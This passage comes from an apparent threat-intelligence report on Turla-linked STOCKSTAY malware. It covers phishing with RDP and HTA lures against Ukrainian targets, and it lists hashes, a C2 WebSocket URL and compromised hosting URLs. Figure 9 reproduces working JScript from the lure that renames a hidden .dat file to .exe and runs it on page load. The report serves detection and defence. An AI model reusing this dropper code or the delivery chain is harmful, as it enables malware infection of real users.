&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 11: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;March 18 – April 3, 2025: Ukraine&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://weatherdataai.theworkpc.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March &lt;span style="vertical-align: baseline;"&gt;31&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MicrosoftUpdateOneDrive.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER Downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;docs.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;9fe944147c15a87963b06baf6473288d64c23655a0ba9369c35566272d8efc73&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;SMEditor.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e1d16fb635060d23e889b0617d77f0cf06d00cc19b43a2c8b5ac53ac027ac722&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;SMNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 12: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://www.drs.gov.ua/wp-content/themes/twentytwentyfive/docs.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://weatherdataai.theworkpc.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 13: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;May 14, 2025: Poland&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May &lt;/span&gt;14, 2025 from Poland. &lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR2.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d3fd32f915c239872c9e7ed9408b1f36dfcef03aa68f9a396d05c437667cdb43&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;GR3.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;98ce3c6e4dd05887ea619f2bbfeb2e2c2805ed07e85e119b79b828b7ef8be397&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 14: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;May 28 – August 8, 2025: Ukraine &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Deployment via Malicious HTA&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;&amp;lt;script language="JScript"&amp;gt;
  function renameAndRunFile() {
    try {
      var oldName = "calculator_2025_files\\styles.dat";
      var newName = "calculator_2025_files\\styles.dat.exe";

      var fso = new ActiveXObject("Scripting.FileSystemObject");

      if (fso.FileExists(oldName)) {
        if (fso.FileExists(newName)) {
          fso.DeleteFile(newName);
        }
        fso.MoveFile(oldName, newName);

        var shell = new ActiveXObject("WScript.Shell");
        shell.Run('"' + newName + '"', 1, false);
      } else {
      }

    } catch (e) {
    }
  }

window.onload = function() {
  renameAndRunFile();
};
&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May &lt;span style="vertical-align: baseline;"&gt;28,&lt;/span&gt; 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May &lt;span style="vertical-align: baseline;"&gt;13,&lt;/span&gt; 2025.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;calculator.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;6da0b4c1a5d0d3fb6e6a2990a82ba51db1f68a3bba818baa46526a29731e2342&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;HTA lure &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(translated filename: “Military personnel cash benefit calculator 2025.hta”)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;0d6b083208097d5b3e189891338540f6c64faaaaf268b0bb0b085dd53d5857b4&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;styles.dat.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;626330d22f77d9cbca9d40cc06568041703f194610c4c5a84bbb05a2e4ee7459&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;EditorToolsPdf.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;447f430b46fad5a3f8e8c5aad1f8f7f79af069489c3d9c29224bb9f14f0c7bf4&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ViewPdf.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
